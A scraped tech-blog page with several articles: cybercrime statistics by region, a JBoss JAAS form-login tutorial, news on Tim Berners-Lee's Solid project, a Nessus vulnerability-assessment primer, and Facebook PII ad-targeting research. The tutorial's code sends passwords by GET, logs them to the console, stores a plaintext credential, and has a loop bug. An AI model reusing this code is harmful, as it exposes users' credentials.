in which the US, under certain circumstances, processes card payments without chip-and-PIN technology. There are instances of cybercrime in South America, but the scope of participation by the southern continent is way smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices. Europe The key aspect making Europe a region with excellent cybercrime potential is the fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, Cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, out of which Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, the findings are presumably the result of the high population of the aforementioned EU countries. A half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine. Asia China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too. Japan takes on a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources. Alternatively, China and Hong Kong are the most prominent locations for hosting phishing domains. From another point of view, the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. In this region, most SEPA members reported losses from the use of skimmed cards. In fact, five (Indonesia, Philippines, South Korea, Vietnam, and Malaysia) out of the top six countries are from this region. Africa Africa remains renowned for combined and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to the one of the European black market. Cybercriminals from Africa make profits from the same products. Nigeria is on the list of the top 10 countries compiled by the EU law enforcement agents featuring identified cybercrime perpetrators and related infrastructure. In addition, four out of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml. Australia and Oceania Australia has two critical cybercrime claims on a global level: First, the country is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detection, and network attack originators. Second, the country-code top-level domain for the Palau Islands in Micronesia is massively used by Chinese attackers as the TLD with the second highest proportion of domains used for phishing. Cybercrime in numbers Experts agree that the past couple of years have seen digital extortion flourishing. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is not an issue only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, because businesses keep it quiet. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue in a conducive way. As far as this goes for corporations, it is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect drops in reputation and to enable uninterrupted execution of public services. When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be a tricky question. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by the security experts. In the second quarter of 2015, Intel Security reported an increase in ransomware attacks by 58%. Just in the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount. Furthermore, they choose to pay and get back to business as usual, thus eliminating further financial damages that may arise due to being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market. Instead of setting unreasonable skyrocketing prices that may cause major panic and draw severe law enforcement action, they keep it low profile. In this way, they maintain the dark business in flow, moving from one victim to the next and evading legal measures. A peculiar perspective – Cybercrime in absolute and normalized numbers “To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year.” This statement by Eric Jardine from the Global Commission on Internet Governance (Jardine, 2015) launched a new perspective of cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings isolated from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed at normalizing crime statistics and thus avoiding negative, realistic cybercrime scenarios that emerge when drawing conclusions from the limited reliability of absolute numbers. In general, there are three ways in which absolute numbers can be misinterpreted: Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is getting better Both numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly Both numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and anything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. Normally, this entangles the clarity of the findings of cybercrime presence in the digital world. When data is borrowed from multiple resources and missing slots are modified with hypothetical numbers, the end result can be skewed. Keeping in mind this observation, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects: The number of active mobile broadband subscriptions The number of smartphones sold to end users The number of domains and websites The volume of total data flow The volume of mobile data flow The annual number of Google searches The Internet’s contribution to GDP It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. Additionally, 77% of users were worried about cyber criminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014). GCIC report results are indicative of a heterogeneous cyber security picture. Although many cybersecurity aspects are deteriorating over time, there are some that are staying constant, and a surprising number are actually improving. Jardine compares cyberspace security to trends in crime rates in a specific country operationalizing cyber attacks via 13 measures presented in the following table, as seen in Table 2 of Summary Statistics for the Security of Cyberspace(E. Jardine, GCIC Report, p. 6):    Minimum Maximum Mean Standard Deviation New Vulnerabilities 4,814 6,787 5,749 781.880 Malicious Web Domains 29,927 74,000 53,317 13,769.99 Zero-day Vulnerabilities 8 24 14.85714 6.336 New Browser Vulnerabilities 232 891 513 240.570 Mobile Vulnerabilities 115 416 217.35 120.85 Botnets 1,900,000 9,437,536 4,485,843 2,724,254 Web-based Attacks 23,680,646 1,432,660,467 907,597,833 702,817,362 Average per Capita Cost 188 214 202.5 8.893818078 Organizational Cost 5,403,644 7,240,000 6,233,941 753,057 Detection and Escalation Costs 264,280 455,304 372,272 83,331 Response Costs 1,294,702 1,738,761 1,511,804 152,502.2526 Lost Business Costs 3,010,000 4,592,214 3,827,732 782,084 Victim Notification Costs 497,758 565,020 565,020 30,342   While reading the table results, an essential argument must be kept in mind. Statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data about US costs of cybercrime indicate costs on a global level. For obvious reasons, however, this assumption may not be true, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels of those measures. The organizational cost of data breaches in 2013 in the United States was a little less than six million US dollars, while the average number on the global level, which was drawn from the Ponemon Institute’s annual Cost of Data Breach Study (from 2011, 2013, and 2014 via Jardine, p.7) measured the overall cost of data breaches, including the US ones, as US$2,282,095. The conclusion is that US numbers will distort global cost findings by expanding the real costs and will work against the paper's suggestion, which is that normalized numbers paint a rosier picture than the one provided by absolute numbers. Summary In this article, we have covered the birth and concept of cyber crime and the challenges law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cyber crime by numbers on varied geographical regions, industries, and devices. Resources for Article:  Further resources on this subject: Interactive Crime Map Using Flask [article] Web Scraping with Python [article]
Read more
  • 0
  • 0
  • 15520
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-jaas-based-security-authentication-jsps
Packt
18 Nov 2013
9 min read
Save for later

JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.) The deployment descriptor is the main configuration file of all the web applications. The container first looks out for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following is the schema element available in the XSD: <xsd:element name="security-constraint" type="j2ee:securityconstraintType"/> <xsd:element name="login-config" type="j2ee:login-configType"/> <xsd:element name="security-role "type="j2ee:security-roleType"/> Getting ready You will need the following to demonstrate authentication and authorization: JBoss 7 Eclipse Indigo 3.7 Create a dynamic web project and name it Security Demo Create a package, com.servlets Create an XML file in the WebContent folder, jboss-web.xml Create two JSP pages, login.jsp and logoff.jsp How to do it... Perform the following steps to achieve JAAS-based security for JSPs: Edit the login.jsp file with the input fields j_username, j_password, and submit it to SecurityCheckerServlet: <%@ page contentType="text/html; charset=UTF-8" %> <%@ page language="java" %> <html > <HEAD> <TITLE>PACKT Login Form</TITLE> <SCRIPT> function submitForm() { var frm = document. myform; if( frm.j_username.value == "" ) { alert("please enter your username, its empty"); frm.j_username.focus(); return ; } if( frm.j_password.value == "" ) { alert("please enter the password,its empty"); frm.j_password.focus(); return ; } frm.submit(); } </SCRIPT> </HEAD> <BODY> <FORM name="myform" action="SecurityCheckerServlet" METHOD=get> <TABLE width="100%" border="0" cellspacing="0" cellpadding= "1" bgcolor="white"> <TABLE width="100%" border="0" cellspacing= "0" cellpadding="5"> <TR align="center"> <TD align="right" class="Prompt"></TD> <TD align="left"> <INPUT type="text" name="j_username" maxlength=20> </TD> </TR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <INPUT type="password" name="j_password" maxlength=20 > <BR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <input type="submit" onclick="javascript:submitForm();" value="Login"> </TD> </TR> </TABLE> </FORM> </BODY> </html> The j_username and j_password are the indicators of using form-based authentication. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see role information is displayed. Update the web.xml file as shown in the following code snippet. We have used 2.5 xsd. The following code needs to be placed in between the webapp tag in the web.xml file: <display-name>jaas-jboss</display-name> <welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>default.html</welcome-file> <welcome-file>default.htm</welcome-file> <welcome-file>default.jsp</welcome-file> </welcome-file-list> <security-constraint> <web-resource-collection> <web-resource-name>something</web-resource-name> <description>Declarative security tests</description> <url-pattern>*.jsp</url-pattern> <http-method>HEAD</http-method> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>role1</role-name> </auth-constraint> <user-data-constraint> <description>no description</description> <transport-guarantee>NONE</transport-guarantee> </user-data-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/logoff.jsp</form-error-page> </form-login-config> </login-config> <security-role> <description>some role</description> <role-name>role1</role-name> </security-role> <security-role> <description>packt managers</description> <role-name>manager</role-name> </security-role> <servlet> <description></description> <display-name>SecurityCheckerServlet</display-name> <servlet-name>SecurityCheckerServlet</servlet-name> <servlet-class>com.servlets.SecurityCheckerServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>SecurityCheckerServlet</servlet-name> <url-pattern>/SecurityCheckerServlet</url-pattern> </servlet-mapping> JAAS Security Checker and Credential Handler: Servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandle and add all the necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the Handler object to the LoginContext class which has the login() method to do the authentication. On successful authentication, it will create Subject and Principal for the user, with user details. We are using iterator interface to iterate the LoginContext object to get the user details retrieved for authentication. In the SecurityCheckerServlet Class: package com.servlets; public class SecurityCheckerServlet extends HttpServlet { private static final long serialVersionUID = 1L; public SecurityCheckerServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { char[] password = null; PrintWriter out=response.getWriter(); try { SecurityAssociationHandler handler = new SecurityAssociationHandler(); SimplePrincipal user = new SimplePrincipal(request.getParameter ("j_username")); password=request.getParameter("j_password"). toCharArray(); handler.setSecurityInfo(user, password); System.out.println("password"+password); CallbackHandler myHandler = new UserCredentialHandler(request.getParameter ("j_username"),request.getParameter ("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login(); Subject subject = lc.getSubject(); Set principals = subject.getPrincipals(); List l=new ArrayList(); Iterator it = lc.getSubject().getPrincipals(). iterator(); while (it.hasNext()) { System.out.println("Authenticated: " + it.next().toString() + "<br>"); out.println("<b><html><body><font color='green'>Authenticated: " + request.getParameter("j_username")+" <br/>"+it.next().toString() + "<br/></font></b></body></html>"); } it = lc.getSubject().getPublicCredentials (Properties.class).iterator(); while (it.hasNext()) System.out.println(it.next().toString()); lc.logout(); } catch (Exception e) { out.println("<b><font color='red'>failed authenticatation.</font>-</b>"+e); } } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } } Create the UserCredentialHandler file: package com.servlets; class UserCredentialHandler implements CallbackHandler { private String user, pass; UserCredentialHandler(String user, String pass) { super(); this.user = user; this.pass = pass; } @Override public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException { for (int i = 0; i < callbacks.length; i++) { if (callbacks[i] instanceof NameCallback) { NameCallback nc = (NameCallback) callbacks[i]; nc.setName(user); } else if (callbacks[i] instanceof PasswordCallback) { PasswordCallback pc = (PasswordCallback) callbacks[i]; pc.setPassword(pass.toCharArray()); } else { throw new UnsupportedCallbackException (callbacks[i], "Unrecognized Callback"); } } } } In the jboss-web.xml file: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>java:/jaas/other</security-domain> </jboss-web> Other is the name of the application policy defined in the login-config.xml file. All these will be packed in as a .war file. Configuring the JBoss Application Server. Go to jboss-5.1.0.GAserver defaultconflogin-config.xml in JBoss. If you look at the file, you can see various configurations for database LDAP and a simple one using the properties file, which I have used in the following code snippet: <application-policy name="other"> <!-- A simple server login module, which can be used when the number of users is relatively small. It uses two properties files: users.properties, which holds users (key) and their password (value). roles.properties, which holds users (key) and a commaseparated list of their roles (value). The unauthenticatedIdentity property defines the name of the principal that will be used when a null username and password are presented as is the case for an unauthenticated web client or MDB. If you want to allow such users to be authenticated add the property, e.g., unauthenticatedIdentity="nobody" --> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRoles LoginModule" flag="required"/> <module-option name="usersProperties"> users.properties</module-option> <module-option name="rolesProperties"> roles.properties</module-option> <module-option name="unauthenticatedIdentity"> nobody</module-option> </authentication> </application-policy> Create the users.properties file in the same folder. The following is the Users. properties file with username mapped with role. User.properties anjana=anjana123 roles.properties anjana=role1 Restart the server. How it works... JAAS consists of a set of interfaces to handle the authentication process. They are: The CallbackHandler and Callback interfaces The LoginModule interface LoginContext The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific. Each container will have its own implementation, here we are using JBoss application server to demonstrate JAAS. In my previous example, I have explicitly called JASS interfaces. UserCredentialHandler implements the CallbackHandler interfaces. So, CallbackHandlers are storage spaces for the user credentials and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to LoginModule interfaces for authentication: CallbackHandler myHandler = new UserCredentialHandler(request. getParameter("j_username"),request.getParameter("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login() The web.xml file defines the security mechanisms and also points us to the protected resources in our application. The following screenshot shows a failed authentication window: The following screenshot shows a successful authentication window: Summary We introduced the JAAs-based mechanism of applying security to authenticate and authorize the users to the application Resources for Article: Further resources on this subject: Spring Security 3: Tips and Tricks [Article] Spring Security: Configuring Secure Passwords [Article] Migration to Spring Security 3 [Article]
Read more
  • 0
  • 0
  • 15486

article-image-sir-tim-berners-lee-on-digital-ethics-and-socio-technical-systems-at-icdppc-2018
Sugandha Lahoti
25 Oct 2018
4 min read
Save for later

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
At the ongoing 40th ICDPPC, International Conference of Data Protection and Privacy Commissioners conference, Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference which is taking place in Brussels this week brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor on ‘Choose Humanity: Putting Dignity back into Digital’; Video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO Apple on personal data and user privacy; ‘What is Ethics?’ by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania among others. Per Techcrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. “Ethics, like technology, is design. As we’re designing the system, we’re designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society.” he told the delegates present at the conference. He also described digital platforms as “socio-technical systems” — meaning “it’s not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written”. “We must consciously decide on both of these, both the social side and the technical side,” he said. “The tech platforms are anthropogenic. They’re made by people. They’re coded by people. And the people who code them are constantly trying to figure out how to make them better.” According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how sociotechnical systems are exploding simple notions of individual rights. “You data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it’s not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too.” He also revealed new plans about his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies’ (Facebook, Google, Amazon, etc) stronghold over user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. The app, he explains, asks you where you want to put your data. So you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store.” “The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up. You are in control of you data life… Wherever you store it you can control and get access to it.” He concluded saying that “We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out.” The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely, Universal Guidelines on Artificial Intelligence at ICDPPC. Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data” EPIC’s Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018 California’s tough net neutrality bill passes state assembly vote.
Read more
  • 0
  • 0
  • 14996

article-image-tim-berners-lee-plans-to-decentralize-the-web-with-solid-an-open-source-project-for-personal-empowerment-through-data
Natasha Mathur
01 Oct 2018
4 min read
Save for later

Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data”

Natasha Mathur
01 Oct 2018
4 min read
Tim Berners-Lee, the creator of the world wide web, revealed his plans of changing the web for the better, as he launched his new startup, Inrupt, last Friday. His major goal with Inrupt is to decentralize the web and get rid of the tech giant’s monopolies (Facebook, Google, Amazon, etc) on the user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. Tim has been working on Solid over the recent years with collaboration from people in MIT. “I’ve always believed the web is for everyone. That's why I and others fight fiercely to protect it. The changes we’ve managed to bring have created a better and more connected world. But for all the good we’ve achieved, the web has evolved into an engine of inequity and division; swayed by powerful forces who use it for their own agendas”, said Tim on his announcement blog post. Solid to provide users with more control over their data Solid will be working on completely changing the current web model that involves users handing over their personal data to digital giants “in exchange for perceived value”. “Solid is how we evolve the web in order to restore balance - by giving every one of us complete control over data, personal or not, in a revolutionary way,” says Tim. Solid offers every user a choice regarding where data gets stored, which specific people and groups can access the select elements in a data, and which apps you use. It will enable you, your family and colleagues, to link and share the data with anyone. Also, people can look at the same data with different apps at the same time, with Solid. Solid technology is built on existing web formats, and developers will have to integrate Solid into their apps and sites. Solid hopes to empower individuals, developers and businesses across the globe with totally new ways to build and find innovative and trusted applications. “I see multiple market possibilities, including Solid apps and Solid data storage”, adds Tim. According to Katrina Brooker, writer at FastCompany, “every bit of data you create or add-on Solid exists within a Solid pod. Solid Pod is a personal online data store. These pods provide Solid users with control over their applications and information on the web. Whoever uses the Solid Platform gets a Solid identity and Solid pod”. This is how Solid will enforce “personal empowerment through data” by helping users take back the power of web from gigantic corporations. Additionally, Tim told Brooker that he’s currently working on a way to create a decentralized version of Alexa, Amazon’s popular digital assistant. “He calls it Charlie. Unlike with Alexa, on Charlie people would own all their data. That means they could trust Charlie with, for example, health records, children’s school events, or financial records. That is the kind of machine Berners-Lee hopes will spring up all over Solid to flip the power dynamics of the web from corporations to individuals”, writes Brooker. Given the recent Facebook security breach that compromised 50M user accounts, and past data misuse scandals such as the Cambridge Analytica scandal, Solid seems to be an angel in disguise that will transfer the data control power into the hands of users. However, there’s no guarantee if Solid will be widely accepted by everyone as a lot of companies on the web are extremely sensitive when it comes to their data. They might not be interested in losing control over that data. But, it’s definitely going to take us one step ahead, to a more free and open Internet. Tim has taken a sabbatical from MIT and has reduced his day-to-day involvement with the World Wide Web Consortium (W3C) to work full time on Inrupt. “It is going to take a lot of effort to build the new Solid platform and drive broad adoption but I think we have enough energy to take the world to a new tipping point,” says Tim. For more coverage on this news, check out the official Inrupt blog.
Read more
  • 0
  • 0
  • 14867

article-image-fundamentals
Packt
20 Jan 2014
4 min read
Save for later

Fundamentals

Packt
20 Jan 2014
4 min read
(For more resources related to this topic, see here.) Vulnerability Assessment and Penetration Testing Vulnerability Assessment ( VA) and Penetrating Testing ( PT or PenTest ) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them with making timely decisions to protect themselves from these vulnerabilities. Vulnerability Assessments and PenTests using Nessus. Nessus is a widely recognized tool for such purposes. This section introduces you to basic terminology with reference to these two types of assessments. Vulnerability in terms of IT systems can be defined as potential weaknesses in system/infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system. Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and published vulnerabilities on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kind of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool. Penetration Testing has an additional step for vulnerability assessment, exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities, and as a next step, will try to penetrate the system by exploiting the identified vulnerabilities. Need for Vulnerability Assessment It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits for conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding. Risk prevention Vulnerability Assessment uncovers the loopholes/gaps/vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance to the different compliance and regulatory requirements since you know your vulnerabilities already. Awareness of such vulnerabilities in time can help an organization to fi x them and mitigate the risks involved in advance before they get exploited. The risks of getting a vulnerability exploited include: Financial loss due to vulnerability exploits Organization reputation Data theft Confidentiality compromise Integrity compromise Availability compromise Compliance requirements The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors such as banking and telecom. The life cycles of Vulnerability Assessment and Penetration Testing This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle: Scoping Information gathering Vulnerability scanning False positive analysis Vulnerability exploitation (Penetration Testing) Report generation The following figure illustrates the different sequential stages recommended to follow for a Vulnerability Assessment or Penetration Testing: Summary In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus. Resources for Article: Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [Article] Penetration Testing and Setup [Article] Web app penetration testing in Kali [Article]
Read more
  • 0
  • 0
  • 14737
article-image-did-you-know-facebook-shares-the-data-you-share-with-them-for-security-reasons-with-advertisers
Natasha Mathur
28 Sep 2018
5 min read
Save for later

Did you know Facebook shares the data you share with them for ‘security’ reasons with advertisers?

Natasha Mathur
28 Sep 2018
5 min read
Facebook is constantly under the spotlight these days when it comes to controversies regarding user’s data and privacy. A new research paper published by the Princeton University researchers states that Facebook shares the contact information you handed over for security purposes, with their advertisers. This study was first brought to light by a Gizmodo writer, Kashmir Hill. “Facebook is not content to use the contact information you willingly put into your Facebook profile for advertising. It is also using contact information you handed over for security purposes and contact information you didn’t hand over at all, but that was collected from other people’s contact books, a hidden layer of details Facebook has about you that I’ve come to call “shadow contact information”, writes Hill. Recently, Facebook introduced a new feature called custom audiences. Unlike traditional audiences, the advertiser is allowed to target specific users. To do so, the advertiser uploads user’s PII (personally identifiable information) to Facebook. After the uploading is done, Facebook then matches the given PII against platform users. Facebook then develops an audience that comprises the matched users and allows the advertiser to further track the specific audience. Essentially with Facebook, the holy grail of marketing, which is targeting an audience of one, is practically possible; nevermind whether that audience wanted it or not. In today’s world, different social media platforms frequently collect various kinds of personally identifying information (PII), including phone numbers, email addresses, names and dates of birth. Majority of this PII often represent extremely accurate, unique, and verified user data. Because of this, these services have the incentive to exploit and use this personal information for other purposes. One such scenario includes providing advertisers with more accurate audience targeting. The paper titled ‘Investigating sources of PII used in Facebook’s targeted advertising’ is written by Giridhari Venkatadri, Elena Lucherini, Piotr Sapiezynski, and Alan Mislove. “In this paper, we focus on Facebook and investigate the sources of PII used for its PII-based targeted advertising feature. We develop a novel technique that uses Facebook’s advertiser interface to check whether a given piece of PII can be used to target some Facebook user and use this technique to study how Facebook’s advertising service obtains users’ PII,” reads the paper. The researchers developed a novel methodology, which involved studying how Facebook obtains the PII to provide custom audiences to advertisers. “We test whether PII that Facebook obtains through a variety of methods (e.g., directly from the user, from two-factor authentication services, etc.) is used for targeted advertising, whether any such use is clearly disclosed to users, and whether controls are provided to users to help them limit such use,” reads the paper. The paper uses size estimates to study what sources of PII are used for PII-based targeted advertising. Researchers used this methodology to investigate which range of sources of PII was actually used by Facebook for its PII-based targeted advertising platform. They also examined what information gets disclosed to users and what control users have over PII. What sources of PII are actually being used by Facebook? Researchers found out that Facebook allows its users to add contact information (email addresses and phone numbers) on their profiles. While any arbitrary email address or phone number can be added, it is not displayed to other users unless verified (through a confirmation email or confirmation SMS message, respectively). This is the most direct and explicit way of providing PII to advertisers. Researchers then further moved on to examine whether PII provided by users for security purposes such as two-factor authentication (2FA) or login alerts are being used for targeted advertising. They added and verified a phone number for 2FA to one of the authors’ accounts. The added phone number became targetable after 22 days. This proved that a phone number provided for 2FA was indeed used for PII-based advertising, despite having set the privacy controls to the choice. What control do users have over PII? Facebook allows users the liberty of choosing who can see each PII listed on their profiles, the current list of possible general settings being: Public, Friends, Only Me.   Users can also restrict the set of users who can search for them using their email address or their phone number. Users are provided with the following options: Everyone, Friends of Friends, and Friends. Facebook provides users a list of advertisers who have included them in a custom audience using their contact information. Users can opt out of receiving ads from individual advertisers listed here. But, information about what PII is used by advertisers is not disclosed. What information about how Facebook uses PII gets disclosed to the users? On adding mobile phone numbers directly to one’s Facebook profile, no information about the uses of that number is directly disclosed to them. This Information is only disclosed to users when adding a number from the Facebook website. As per the research results, there’s very little disclosure to users, often in the form of generic statements that do not refer to the uses of the particular PII being collected or that it may be used to allow advertisers to target users. “Our paper highlights the need to further study the sources of PII used for advertising, and shows that more disclosure and transparency needs to be provided to the user,” says the researchers in the paper. For more information, check out the official research paper. Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma How far will 